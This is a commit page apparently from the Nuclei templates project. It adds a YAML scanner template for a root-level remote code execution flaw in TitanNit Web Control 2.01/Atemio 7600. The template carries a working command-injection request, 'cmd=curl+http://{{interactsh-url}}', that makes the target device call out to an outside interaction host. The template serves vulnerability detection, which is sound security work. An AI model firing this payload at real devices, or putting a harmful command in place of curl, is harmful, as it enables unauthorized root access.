Merge pull request #9625 from projectdiscovery/titannit-web-ssrf
Create titannit-web-ssrf.yamlpatch-1
commit
87728551f1
|
@ -0,0 +1,36 @@
|
||||||
|
id: titannit-web-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TitanNit Web Control 2.01/Atemio 7600 Root - Remote Code Execution
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application,allowing the attacker to gain root access.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51853
|
||||||
|
- https://github.com/projectdiscovery/nuclei-templates/issues/8716
|
||||||
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: title="TitanNit Web Control"
|
||||||
|
tags: titanit,web-control,ssrf,oast,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "titan.css"
|
Loading…
Reference in New Issue